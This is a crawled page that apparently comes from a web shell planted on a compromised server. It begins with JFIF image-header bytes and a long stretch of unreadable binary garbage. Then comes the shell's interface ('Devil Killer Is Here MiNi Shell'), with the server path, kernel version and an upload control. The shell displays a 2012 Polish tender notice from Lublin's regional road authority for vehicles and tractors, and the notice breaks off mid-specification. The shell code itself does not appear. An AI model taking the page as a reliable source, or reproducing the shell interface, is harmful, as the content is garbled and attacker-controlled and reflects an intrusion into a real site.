JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121008/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121008/386264-N-2012.html

<p class="kh_header"><b>Lublin: Dostawa samochodów patrolowo-osobowych, przyczepy samowyładowczej oraz ciągników rolniczych z osprzętem (uniwersalne hydrauliczne ramię robocze z głowicą do koszenia traw i krzewów) oraz chłodnic oleju hydraulicznego.

Zadanie Nr 1 - dostawa 4 szt. samochodów patrolowo-osobowych, 
Zadanie Nr 2 - dostawa 1 szt. przyczepy samowyładowczej, 
Zadanie Nr 3 - dostawa 2 szt. ciągników rolniczych z osprzętem (uniwersalne hydrauliczne ramię robocze z głowicą do koszenia traw i krzewów) oraz 6 szt. chłodnic oleju hydraulicznego.</b><br>
<b>Numer ogłoszenia: 386264 - 2012; data zamieszczenia: 08.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich , ul. Turystyczna 7A, 20-207 Lublin, woj. lubelskie, tel. 081 7495300, faks 081 7495341.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa samochodów patrolowo-osobowych, przyczepy samowyładowczej oraz ciągników rolniczych z osprzętem (uniwersalne hydrauliczne ramię robocze z głowicą do koszenia traw i krzewów) oraz chłodnic oleju hydraulicznego.

Zadanie Nr 1 - dostawa 4 szt. samochodów patrolowo-osobowych, 
Zadanie Nr 2 - dostawa 1 szt. przyczepy samowyładowczej, 
Zadanie Nr 3 - dostawa 2 szt. ciągników rolniczych z osprzętem (uniwersalne hydrauliczne ramię robocze z głowicą do koszenia traw i krzewów) oraz 6 szt. chłodnic oleju hydraulicznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Dostawa samochodów patrolowo-osobowych, przyczepy samowyładowczej oraz ciągników rolniczych z osprzętem (uniwersalne hydrauliczne ramię robocze z głowicą do koszenia traw i krzewów) oraz chłodnic oleju hydraulicznego.
Zadanie Nr 1 - dostawa 4 szt. samochodów patrolowo-osobowych, 

Zadanie Nr 2 - dostawa 1 szt. przyczepy samowyładowczej,

Zadanie Nr 3 - dostawa 2 szt. ciągników rolniczych z osprzętem (uniwersalne hydrauliczne ramię robocze z głowicą do koszenia traw i krzewów) oraz 6 szt. chłodnic oleju hydraulicznego.

Zgodnie z art. 30 ust. 4 ustawy, Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowana dostawa (samochody patrolowo-osobowe i ciągniki rolnicze) spełnia wymagania określone przez Zamawiającego (art. 30, ust. 5 ustawy).
Za rozwiązanie równoważne uznana będzie oferta na:
1)	dostawę samochodów patrolowo-osobowych spełniających wymogi innej normy, pod warunkiem że parametry techniczne zawarte w takiej normie nie będą gorsze od parametrów określonych w normie EURO 5, 
2)	dostawę ciągników rolniczych spełniających wymogi innej normy, pod warunkiem że parametry techniczne zawarte w takiej normie nie będą gorsze od parametrów określonych w normie EURO 3.

Wartość zamówienia (Zadanie nr 1, Zadanie nr 2, Zadanie nr 3) - 556 910,57 zł netto..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 42.90.00.00-5, 34.11.00.00-1, 16.52.00.00-6, 16.31.00.00-1, 16.70.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości:
- Zadanie nr  1 - 2.000,00 zł, (słownie złotych: dwa tysiące00/100).
 - Zadanie nr 2  - 400,00, (słownie złotych: czterysta 00/100).
 - Zadanie nr 3 - 5.000,00, (słownie złotych: pięć tysięcy 00/100)
W przypadku oferty na wykonanie więcej niż jednego Zadania Wykonawca winien wnieść zsumowaną kwotę wadium za poszczególne Zadania
2.	Wadium może być wnoszone w jednej lub kilku następujących formach  zgodnie 
z  art. 45, ust. 6 ustawy Prawo zamówień publicznych:
a) Pieniądzu;
b) Poręczeniach bankowych lub poręczeniach spółdzielczej kasy  oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) Gwarancjach bankowych;
d) Gwarancjach ubezpieczeniowych;
e) Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109 poz. 1158, z późń. zm.)
3.	Wadium może być wnoszone w formach określonych w art. 45, ust. 6 ustawy Prawo zamówień publicznych.
4.	Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto ZDW w Lublinie 
w Kredyt Banku S.A. O/Lublin nr 89 1500 1520 1215 2004 1596 0000.
5.	W ofercie należy złożyć dokument potwierdzający wniesienie wadium.


UWAGA:
1.	Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy Prawo zamówień publicznych, tzn. przelewem na rachunek bankowy wskazany przez zamawiającego. W myśl art. 63. ust. 3 pkt.1 ustawy Prawo bankowe z dnia 29 sierpnia 1997r. (Dz. U z 2002 Nr 72 poz. 665 j. t.) polecenie przelewu jest jedną z form rozliczenia bezgotówkowego. Zgodnie z art. 63c Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą 
i uznania tą kwotą rachunku wierzyciela. 
Oznacza to, że wpłata gotówkowa wadium wnoszona na poczcie lub w banku nie stanowi polecenia przelewu w rozumieniu wyżej cytowanych artykułów.
2.	Wadium wnoszone przelewem (art. 45 ust. 7 ustawy pzp) uważa się za wniesione w terminie, jeżeli wpłynie na konto ZDW w Lublinie przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	W przetargu mogą wziąć udział Wykonawcy, którzy spełniają warunek dotyczący:
1)	Posiadania wiedzy i doświadczenia;
2.	Opis sposobu dokonywania oceny spełniania warunku udziału:
1)	Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca  winien wykonać w ciągu ostatnich 3 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 1 dostawę polegającą na:
- dla Zadania  nr 1 - dostawie  min. 1 szt. nowego samochodu patrolowo-osobowego
-  dla Zadania  nr 2 - dostawie  min. 1 szt. przyczepy samowyładowczej;
-  dla Zadania nr 3 - dostawie  min. 1 szt. ciągnika wraz z osprzętem;

Zamawiający dopuszcza możliwość ubiegania się o więcej niż jedno Zadanie. W takim przypadku Wykonawca musi spełnić ww. warunek udziału odpowiednio dla poszczególnych Zadań. W celu potwierdzenia spełniania ww. warunku udziału Wykonawca załączy do oferty Oświadczenie potwierdzające spełnianie warunku udziału polegającego na posiadaniu wiedzy i doświadczenia.
3.	W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu innych podmiotów Zamawiający żąda dołączenia do oferty pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Przez pisemne zobowiązanie podmiotu trzeciego rozumie się oryginał zobowiązania lub kserokopię zobowiązania poświadczoną, za zgodność z oryginałem przez ten podmiot (zgodnie z wyrokami KIO nr;  KIO 786/11 , KIO 787/11, KIO 797/11 , KIO 830/11 , KIO 1008/11)  
UWAGA!
1)	W przypadku gdy Wykonawca polega na zasobach innych podmiotów jego obowiązkiem jest udowodnienie, że rzeczywiście będzie dysponował wskazanymi zasobami w czasie realizacji zamówienia. W szczególności dotyczy to udostępnienia wiedzy i doświadczenia przez podmiot trzeci. W takim przypadku dla wykazania faktycznego dysponowania odpowiednią wiedzą i doświadczeniem podmiotu trzeciego przy realizacji zamówienia niezbędne może być powołanie się na udział podmiotu trzeciego w wykonywaniu zamówienia. (PRAWO ZAMÓWIEŃ PUBLICZNYCH PO ZMIANACH z 2009 r. pod redakcją Jacka Sadowego)
4.	Zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji  niezbędnych zasobów winno posiadać formę pisemną,  stosowną treść, z której będzie wynikało, że podmiot ten zobowiązał się do udostępnienia określonych zasobów na okres korzystania z nich przy wykonaniu zamówienia oraz dla swej skuteczności musi zostać złożone przez osobę/osoby uprawnione do reprezentowania podmiotu trzeciego w powyższym zakresie. Zobowiązanie złożone przez osobę nieuprawnioną nie dowodzi udostępnienia zasobu przez podmiot trzeci.(Zgodnie z wyrokiem KIO2213/11)
5.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w.w warunki udziału mogą być spełnione łącznie.
6.	Ocena spełniania warunków będzie dokonywana w następujący sposób: spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">lub inny dokument potwierdzający spełnienie wymagań technicznych ciągników wraz z osprzętem, chłodnicy oleju hydraulicznego, przyczepy samowyładowczej, samochodu (marka/typ, rok produkcji oraz wyszczególnienie co najmniej tych parametrów technicznych oraz wyposażenia o których mowa w  Opisie przedmiotu zamówienia),</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Dowód wniesienia wadium. b) Ofertę przetargową (z ceną netto i z podatkiem VAT) c) Wykaz części zamówienia, których wykonanie Wykonawca zamierza zlecić podwykonawcy d) W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument (np. odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych. e) W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które nie są wymienione w odpisie z właściwego rejestru do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby podpisujące ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, polegających na:zmianie terminu wykonania umowy w przypadku wniesienia przez wykonawcę/wykonawców, po upływie terminu składania ofert odwołania do Prezesa Krajowej Izby Odwoławczej. Termin wykonania umowy wydłuża się o liczbę dni odpowiadającą okresowi zawieszenia terminu związania ofertą</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ebip.lublin.pl/zdw<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można odebrać w siedzibie Zamawiającego, lok. 203, lub otrzymać pocztą po wcześniejszym przesłaniu zamówienia na adres:dzp@zdw.lublin.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2012 godzina 10:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, ul. Turystyczna 7a, pok. 107. Otwarcie ofert nastąpi w dniu 16.10.2012 o godz.10:30 w pok. 208..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Informacje o sposobie porozumiewania się zamawiającego z wykonawcami a także wskazanie osób uprawnionych do porozumiewania się z wykonawcami Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za pomocą faksu nr (081) 749-53-41; (081) 749-53-77 lub drogą elektroniczną na adres e-mail: dzp@zdw.lublin.pl. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania. Osoby uprawnione do porozumiewania się z wykonawcami: 1.W sprawach technicznych - Wydział Administracji i Zaplecza Technicznego, inż. Andrzej Sieńko(0-81) 749-53-09. 2.W sprawach formalno-prawnych związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - Wydział Umów, mgrinż. Sławomir Szepietowski, tel. (081) 749-53-44; 749-53-29. UWAGA: Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, proszeni są o przesłanie krótkiej informacji faksem (0-81) 749-53-77 lub pocztą elektroniczną na adres dzp@zdw.lublin.pl zawierającej podstawowe dane firmy (nazwa, adres, numer tel. i faksu, adres poczty elektronicznej). Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np.: zapytaniach, wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia, zwołaniu przez Zamawiającego zebrania wszystkich wykonawców, przedłużeniu terminu składania ofert..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa 4 szt. samochodów patrolowo-osobowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zadania nr 1 należy dostarczyć:

samochód patrolowo- osobowy - 4 szt

Wymagane parametry:

1) Wymagania ogólne
- Pojazd musi być fabrycznie nowy ( wyprodukowany po 01.01.2012 r.),
- Typ pojazdu: osobowy 4 miejsca siedzące,
- Pojazd musi spełniać wymogi normy ochrony środowiska  EURO 5,
- Pojazd musi posiadać dokumenty niezbędne do zarejestrowania bez dodatkowych
   czynności, oraz instrukcję w języku polskim, wyciąg ze świadectwa homologacji, 
   karta pojazdu,
- Okres gwarancji min. 24 miesiące od daty bezusterkowego protokolarnego odbioru bez limitu kilometrów na samochód,
- Gwarancja na perforację blach min. 6 lat,
- Gwarancja na powłoki lakiernicze min 2 lata,
- Serwis pojazdu musi się znajdować w odległości nie większej jak 50 km. od Lublina,
- Serwis gwarancyjny  w systemie całodobowym, samochód zastępczy w przypadku 
  naprawy  trwającej powyżej 24 godzin,

2) Warunki techniczne:
- Silnik benzynowy,
- Średnie zużycie paliwa w cyklu mieszanym nie może przekraczać 7 l/100km,
- Pojemność skokowa 900-1250 cm3,
- Moc silnika 68-95 KM,
- Skrzynia biegów manualna
- Kolor nadwozia czerwony ( zamawiający dopuszcza inny kolor nadwozia za wyjątkiem białego),
- Liczba drzwi-5 szt.,
- Nawiewy boczne oraz na konsoli centralnej regulowane,
- Klimatyzacja regulowana ręcznie (dopuszczalna elektroniczna),
- Ogrzewana tylna szyba z wycieraczką,
- Kołpaki na koła,
- ABS,
- Poduszka powietrzna kierowcy,
- Pasy bezpieczeństwa przednie i tylne,
- Zagłówki z przodu i tyłu pełne,
- Wspomaganie układu kierowniczego,
- Centralny zamek drzwi zdalnie sterowany falami radiowymi,
- Zespolona lampa ostrzegawcza z oświetleniem LBX  koloru pomarańczowego z napisem SŁUŻBA DROGOWA zamontowana na belce na dachu samochodu,
- Radioodtwarzacz z odtwarzaczem CD,
- Autoalarm,
- System blokady zapłonu z kodem w kluczyku,
- Dodatkowy kpl. kół z oponami zimowymi,
- Hak holowniczy,
- Dywaniki podłogowe.
- Napisy boczne Służba Drogowa RDW ..(dokładna nazwa zostanie podana po rozstrzygnięciu przetargu).

Samochody patrolowo-osobowe należy dostarczyć na ul. Turystyczną 7A, Lublin.

Wartość Zadania nr 1 - 130 081,30 zł. netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.11.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - dostawa 1 szt. przyczepy samowyładowczej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zadania nr 2 należy dostarczyć:

przyczepę samowyładowczą - 1szt.

Wymagane parametry techniczne przyczepy:
  - dwuosiowa
- rok produkcji 2012 - fabrycznie nowa
-ładowność  od 4000 do 6000 kg.
- wywrot trzystronny
- wysokość bort min. 40 cm.
- znak bezpieczeństwa CE
- oznakowanie tylnej borty trójkątem ostrzegawczym
- gwarancja jakości min. 12 miesięcy
- Wykonawca zabezpieczy serwis gwarancyjny w miejscu przebywania przyczepy w  ciągu 48 godz. od chwili zgłoszenia awarii
- przyczepa musi posiadać dokumenty niezbędne do zarejestrowania bez dodatkowych czynności,      oraz instrukcję w języku polskim, wyciąg ze świadectwa homologacji

Przyczepę samowyładowczą należy dostarczyć do Rejonu Dróg Wojewódzkich w Chełmie 
ul.  Lwowska 24, 22-100 CHEŁM.

Wartość Zadania 2 - 28 455,28 zł. netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.52.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3 - dostawa 2 szt. ciągników rolniczych z osprzętem (uniwersalne hydrauliczne ramię robocze z głowicą do koszenia traw i krzewów) oraz 6 szt. chłodnic oleju hydraulicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zadania nr 3 należy dostarczyć:
ciągnik rolniczy - szt. 2 wraz z uniwersalnym hydraulicznym ramieniem roboczym 
i głowicą do koszenia traw i krzewów oraz 6 szt. chłodnic oleju hydraulicznego
  
 Wymagane parametry:

1) Wymagane parametry techniczne ciągnika:
 - Rok produkcji 2012 (fabrycznie nowy)
- Silnik diesla 
- Moc silnika min 82KM  
- Silnik spełniający normy EURO III,
- Silnik chłodzony cieczą,
- Układ napędowy:
- napęd na cztery koła 4x4,

- prędkość transportowa zmierzona , co najmniej 40 km/h, 
